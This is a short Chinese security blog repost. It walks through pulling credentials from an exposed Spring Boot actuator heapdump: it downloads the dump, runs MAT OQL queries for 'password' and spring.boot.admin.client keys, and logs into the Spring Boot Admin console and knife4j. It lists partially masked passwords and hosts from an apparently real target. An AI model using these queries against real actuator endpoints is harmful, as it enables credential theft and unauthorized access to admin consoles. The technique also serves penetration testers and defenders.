spring.boot.admin.client.password //配置spring boot admin 后台的密码
spring.boot.admin.client.url //配置spring boot admin 后台的urlspring.boot.
admin.client.username //配置spring boot admin 后台的账号
Spring Boot Admin 后台特征
目录扫描:
https://xxxxxx/actuator
下载heapdump
使用mat进行分析
使用命令进行password关键词查询
select* from java.util.LinkedHashMap$Entry x WHERE(toString(x.key).contains("password"))
技巧:
使用go into进行查询
获取到的账号密码:
knixxxxx:JnrsxxxxxQing!0531!@
rexxxxxxx:JnrsxxxxxQing0531
rxxxxxx:rxxxxxx/JnrsxxxxxQing_123
获取sping boot admin的url和账号密码
获取到url
select* from java.util.LinkedHashMap$Entry x WHERE(toString(x.key).contains("spring.boot.admin.client.url"))
访问网站
http://xxxxxxxx2:8000/
获取密码
select* from java.util.LinkedHashMap$Entry x WHERE(toString(x.key).contains("spring.boot.admin.client.password"))
获取用户名
select* from java.util.LinkedHashMap$Entry x WHERE(toString(x.key).contains("spring.boot.admin.client.username"))
获取到:用户/密码
monxxxx/jnrsxxxxx
成功进入后台
4. 补充(knife4j)
knife4j是一个类似于swagger的后端接口程序
它可以设置账号密码,上文读取到的knife4j的密码就可以在knife4j中使用
knife4j
后续可以测试未授权等问题,测试流程就和swagger类似,不再阐述
原文始发于微信公众号(NGC660安全实验室):【黑客揭秘】通过heapdump使用mat进行分析,解锁Spring Boot Admin后台隐藏的密码宝藏!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论